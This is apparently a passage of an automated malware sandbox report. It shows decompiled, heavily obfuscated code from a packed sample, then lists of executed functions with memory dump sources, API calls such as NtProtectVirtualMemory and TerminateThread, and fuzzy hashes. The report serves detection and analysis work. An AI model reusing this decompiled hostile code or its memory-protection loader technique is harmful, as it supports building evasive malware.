                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					asm("scasd");
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t94;
                					L4:
                					 *_t67 =  *_t67 + _t67;
                					 *((intOrPtr*)(_t67 + _t67)) =  *((intOrPtr*)(_t67 + _t67)) + _t88;
                					_push(_t94);
                					_push(_t132);
                					_t95 = _t94 - 1;
                					_push(_t80);
                					_push(_t132);
                					_push(_t95);
                					 *0x53000b01 =  *0x53000b01 + _t88;
                					_push(_t67);
                					_t68 = _t67 - 1;
                					_t133 = _t132 - 1;
                					_t90 = _t88;
                					_t81 = _t80 - 1;
                					_push(_t81);
                					 *_t90 =  *_t90 + _t81;
                					 *_t68 =  *_t68 + _t68;
                					_t96 = _t95 + 1;
                					 *_t96 =  *_t96 + _t68;
                					 *((intOrPtr*)(_t81 + _t90)) =  *((intOrPtr*)(_t81 + _t90)) + _t133;
                					 *((intOrPtr*)(_t81 + 0x49)) =  *((intOrPtr*)(_t81 + 0x49)) + _t96;
                					_push(_t68);
                					_t69 = _t68 - 1;
                					_t134 = _t133 - 1;
                					_t91 = _t90 - 1;
                					_t82 = _t81 - 1;
                					_t125 = 0xffffffffe69a4403;
                					_push(_t82);
                					 *0xe56 =  *0xe56 + _t96;
                					_t97 = _t96 -  *((intOrPtr*)(_t110 + 1 - 0xffffffffffffffff));
                					 *_t69 =  *_t69 + _t69;
                					asm("loopne 0x11");
                					 *_t69 =  *_t69 + _t69;
                					asm("a16 sbb al, 0x0");
                					 *((intOrPtr*)(_t69 + _t69 + 0x46)) =  *((intOrPtr*)(_t69 + _t69 + 0x46)) + _t69;
                					_t106 = _t102 - 0xffffffffffffffff + _t102 - 0xffffffffffffffff;
                					 *_t97 =  *_t97 + _t82;
                					 *_t69 =  *_t69 + _t69;
                					 *_t91 =  *_t91 + _t69;
                					_push(es);
                					_t34 =  &(_t91[0xfffffffff34d221d]);
                					 *_t34 = _t91[0xfffffffff34d221d] + _t97;
                					if( *_t34 >= 0) {
                						 *_t82 =  *_t82 + _t91;
                						_pop(es);
                						asm("rol byte [ebx], 0x0");
                						 *_t69 = _t91 +  *_t69;
                						0xff401588();
                						 *_t69 =  *_t69 + _t69;
                						 *_t97 =  *_t97 + _t69;
                						_push(es);
                						_t91[0x1b] = _t91 + _t91[0x1b];
                						asm("popad");
                						 *[gs:bx+si] =  *[gs:bx+si] ^ _t69;
                						asm("sbb [ebx], al");
                						asm("lock add al, cl");
                						_t82 = _t82 +  *_t91 |  *(_t106 - 0xfe10fc);
                						_t134 = _t134 +  *_t82;
                						 *_t69 =  *_t69 + _t69;
                						 *_t82 =  *_t82 + _t69;
                						_t69 = _t69 + 0x6e694c00;
                					}
                					asm("outsb");
                					 *[gs:eax] =  *[gs:eax] ^ _t69;
                					_pop(ss);
                					_t126 = _t125 + _t69;
                					 *_t69 =  *_t69 | _t69;
                					 *((intOrPtr*)(_t69 + _t126 * 8)) =  *((intOrPtr*)(_t69 + _t126 * 8)) + _t69;
                					 *_t69 =  *_t69 | _t69;
                					 *0xd98 =  *0xd98 + _t69;
                					asm("enter 0xa, 0x0");
                					 *_t97 =  *_t97 + 1;
                					_t70 = _t69 + 6;
                					 *_t70 =  *_t70 + _t70;
                					 *((intOrPtr*)(_t70 + 0x7004069)) =  *((intOrPtr*)(_t70 + 0x7004069)) + _t91;
                					 *_t70 =  *_t70 + _t70;
                					 *((intOrPtr*)(_t126 + 0x70040)) =  *((intOrPtr*)(_t126 + 0x70040)) + _t91;
                					 *_t70 =  *_t70 + _t70;
                					 *_t70 =  *_t70 + _t70;
                					 *_t70 =  *_t70 + _t91;
                					_t71 = _t70 & 0x00070040;
                					 *_t71 =  *_t71 + _t71;
                					_t72 = _t71 + 1;
                					 *_t106 =  *_t106 + _t72;
                					 *_t72 =  *_t72 + _t72;
                					 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x40)) + _t72;
                					 *_t106 =  *_t106 + _t72;
                					 *_t72 =  *_t72 + _t72;
                					 *_t134 =  *_t134 + _t72;
                					_t73 = _t72 + 1;
                					 *_t106 =  *_t106 + _t73;
                					 *_t73 =  *_t73 + _t73;
                					_t75 = _t73 + _t73 &  *(_t73 + _t73);
                					es = 0x7004025;
                					 *_t75 =  *_t75 + _t75;
                					 *((intOrPtr*)(_t82 + 0x40)) =  *((intOrPtr*)(_t82 + 0x40)) + _t97;
                					 *_t106 =  *_t106 + _t75;
                					 *_t75 =  *_t75 + _t75;
                					 *_t75 =  *_t75 + _t75;
                					_t76 = _t75 &  *_t75;
                					es = es;
                					 *_t76 =  *_t76 + _t76;
                					_t78 = _t76 + _t76 &  *(_t76 + _t76);
                					_push(_t78);
                					 *_t78 =  *_t78 + _t78;
                					_t57 = _t82 + 0x7e6e97a6;
                					 *_t57 =  *((intOrPtr*)(_t82 + 0x7e6e97a6)) + _t78;
                					if( *_t57 > 0) {
                						asm("repe adc [ebx+0x8b], ah");
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *((intOrPtr*)(_t78 + 1)) =  *((intOrPtr*)(_t78 + 1)) + _t97;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                						 *_t78 =  *_t78 + _t78;
                					}
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t91 =  *_t91 | _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *_t78 =  *_t78 + _t78;
                					 *0x4c004014 =  *0x4c004014 + 0x4c004014;
                					 *0x4c004014 =  *0x4c004014 + _t97;
                					 *0x4c004014 =  *0x4c004014 + 0x4c004014;
                					asm("invalid");
                					 *0x4BDAC755 = 0x4c004014;
                					goto __ecx;
                				}
                				asm("repe adc [ebx+0x26886f8b], ah");
                				_t18 = _t102 + 0x37;
                				 *_t18 =  *(_t102 + 0x37) ^ _t132;
                				if( *_t18 > 0) {
                					goto L4;
                				}
                				asm("adc eax, 0x398128ce");
                				asm("o16 salc");
                				_t80 = _t80 ^  *(_t88 - 0x48ee309a);
                				asm("stosb");
                				 *((intOrPtr*)(_t67 - 0x2d)) =  *((intOrPtr*)(_t67 - 0x2d)) + _t67;
                				goto L3;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp
                Similarity
                • API ID: #100
                • String ID: VB5!6&*
                • API String ID: 1341478452-3593831657
                • Opcode ID: d7497170fae8b8ed2b903cd0e9b50451e028a76d534d3bdeb8e90549fd3b8333
                • Instruction ID: 542af500f5b2e05c6b8c94c0219025500403f8f387b0386592e1285b7037487e
                • Opcode Fuzzy Hash: d7497170fae8b8ed2b903cd0e9b50451e028a76d534d3bdeb8e90549fd3b8333
                • Instruction Fuzzy Hash: 57710C6108E7C15FD3138B708CA66A13FB0AE53228B0E46EBD4D5CE0E3D25D495AC7A3
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1661285546
                • Opcode ID: b1befa007f387eef648ca0b00ffba4e43053b8b9cee6ac3b10e6fb3213b82ebc
                • Instruction ID: f265f33f51b577c451686bb36c16e6163af3027241b8a05e002670247bb8424f
                • Opcode Fuzzy Hash: b1befa007f387eef648ca0b00ffba4e43053b8b9cee6ac3b10e6fb3213b82ebc
                • Instruction Fuzzy Hash: 69B01220394501BAD62196586D5993813C0D3427C03A00C33F800F11D0C7B8DE40822D
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Strings
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID: (v#~
                • API String ID: 2706961497-497706869
                • Opcode ID: 8df8855147466043b3fafee3be6c2757db574435f4d483dfafa72b47499c7470
                • Instruction ID: 3a8dc6f2417320795155d3ea1e680b6859ab9298c5f82907c57a8148a487396a
                • Opcode Fuzzy Hash: 8df8855147466043b3fafee3be6c2757db574435f4d483dfafa72b47499c7470
                • Instruction Fuzzy Hash: C22130B85023019FEF345EAC85DB7563F59FF5A320BA1415DEC82C7166D721CCC64A25
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: d6b8e715442860c553170c7d11118e1bf7d866eb4a8cf628ff931335ffffc572
                • Instruction ID: a3ea41e13fd1c2297a47bcd61f9fcd55b7901a9060fc0e5a90494ade34b58a08
                • Opcode Fuzzy Hash: d6b8e715442860c553170c7d11118e1bf7d866eb4a8cf628ff931335ffffc572
                • Instruction Fuzzy Hash: 4801BCB4946340CFF7588F24C88EB2ABBA8BF04365F258194E5118B1B6D3B4CC80CF12
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 9bbe85bf0444ae7c78349fb688be378aa7bf9e3162cc274e3d1f29842df34879
                • Instruction ID: 9dae431f7ac9cb68a866881bf97bd0aabda67f51be8dad259f8503a09f2d22fd
                • Opcode Fuzzy Hash: 9bbe85bf0444ae7c78349fb688be378aa7bf9e3162cc274e3d1f29842df34879
                • Instruction Fuzzy Hash: D731AF782023019FEF248DAC86DA7973F96EF5A320F91816DEC87D7166D721CC868A15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 91f11cebd485df8daab95a99851e673b8d2730abf930c2b0debb1942841053c8
                • Instruction ID: 88e0dd89080e6dc60354a6c73d86bded169412beb0b0fc514c9b6978f2b15b8e
                • Opcode Fuzzy Hash: 91f11cebd485df8daab95a99851e673b8d2730abf930c2b0debb1942841053c8
                • Instruction Fuzzy Hash: 17313978103301DFEF258E6DC5977463F66FF5A320B65429EDC818B266D732DC8A8A11
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: f032f46a9f93d1c3383be7a3d1e10b06d4b25adac1051763d5ea898941c8a694
                • Instruction ID: bc8f111c1017bafaf0bcb5208f40552cee1eb2a908402a1f5481bc1aab24e561
                • Opcode Fuzzy Hash: f032f46a9f93d1c3383be7a3d1e10b06d4b25adac1051763d5ea898941c8a694
                • Instruction Fuzzy Hash: F011597A0072018FDB254E3C805A7867BA6FF57324379829DCC928B225CB36D48A8A51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056EF89
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 6caa463588e3d281e5b76fac1363d63f82394c31355dbd104aa1b4d7cfa3943e
                • Instruction ID: 4d6cfcd8faae2cf9165734602e7971eef86f743dd9381704423673651faad842
                • Opcode Fuzzy Hash: 6caa463588e3d281e5b76fac1363d63f82394c31355dbd104aa1b4d7cfa3943e
                • Instruction Fuzzy Hash: EEF0E2B19422108FF7588E35880D75EBBA8EF103A5F258194E4608B1B5D3B888C08F42
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • TerminateThread.KERNEL32(8115E2CC,-89A3C4D4), ref: 0056EBA4
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: TerminateThread
                • String ID:
                • API String ID: 1852365436-0
                • Opcode ID: f550a2583beec6f6960b6c8c80ac3106b9322383d630b3f1906582ce0c006eed
                • Instruction ID: 28b44607e55aa4c309a7f45447513829d81eefaf77de8541aef2fdd9905429e1
                • Opcode Fuzzy Hash: f550a2583beec6f6960b6c8c80ac3106b9322383d630b3f1906582ce0c006eed
                • Instruction Fuzzy Hash: 5B2106B96153828FCBA49E38C9D979F7BD1BF55340F54595ADC8ACB561D331C880CB02
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • TerminateThread.KERNEL32(8115E2CC,-89A3C4D4), ref: 0056EBA4
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: TerminateThread
                • String ID:
                • API String ID: 1852365436-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNEL32(00000005), ref: 0056EF14
                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056EF89
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectSleepVirtual
                • String ID:
                • API String ID: 3235210055-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions